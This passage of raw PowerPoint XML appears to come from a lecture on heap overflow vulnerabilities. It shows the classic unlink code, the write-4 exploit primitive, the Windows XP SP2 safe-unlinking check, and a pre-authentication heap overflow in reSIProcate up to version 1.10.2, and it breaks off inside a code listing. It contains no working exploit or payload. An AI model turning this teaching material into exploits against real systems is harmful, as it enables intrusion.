            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = p-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = p-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37355633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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1630016" y="436776"/>
            <a:ext cx="9947137" cy="964441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap overflow vulnerabilities: write-4 exploit primitive</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> magazine, 2001)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3039069" y="1401217"/>
            <a:ext cx="5703225" cy="4853809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="444500" dist="406400" dir="2160000" algn="l" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="486840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16765" y="587055"/>
            <a:ext cx="11245850" cy="803876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap overflow vulnerabilities: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                            Windows XP SP2 heap verification checks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF72326E-643E-4D97-9376-2CDF950A0AFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187355" y="2213843"/>
            <a:ext cx="10353706" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the following is true for the doubly-linked list, unlinking a memory chunk is possible:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write-4-exploit primitive no longer works for these doubly-linked lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2968325" y="3337227"/>
            <a:ext cx="6162026" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Entry-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;Bk == Entry-&gt;Bk-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == Entry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Arrow: Down 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{107EEBCC-41B4-4F21-A480-EE4077D1A892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5595582" y="4054646"/>
            <a:ext cx="600501" cy="998436"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent5">
                  <a:lumMod val="47000"/>
                  <a:alpha val="19000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="48000">
                <a:schemeClr val="tx2">
                  <a:alpha val="68000"/>
                  <a:lumMod val="0"/>
                  <a:lumOff val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="162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03531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83026" y="410817"/>
            <a:ext cx="11245850" cy="646389"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reSIProcate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> heap overflow vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{289C9D21-78F8-4FB6-BD48-A6ECEB02D584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702366" y="2199862"/>
            <a:ext cx="10378628" cy="3136243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reSIProcate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: cross-platform (Linux, Windows, FreeBSD, Mac OS, Android, iPhone, …) open-source SIP stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CounterPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Bria, Zoiper, 3CX Phone System, Cisco, Logitech, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Pre-authentication heap overflow vulnerability affecting server (PBX) and client (softphone) software using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reSIProcate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;= 1.10.2 with TLS enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Discovered in 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24415537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6CBEAE2-3F33-44AC-A5BE-CD5F89E54197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486025" y="1515565"/>
            <a:ext cx="7562850" cy="4647110"/>
          </a:xfr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13500000" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:prstDash val="sysDash"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ConnectionBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">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preparseNewBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int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bytesRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* ... */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
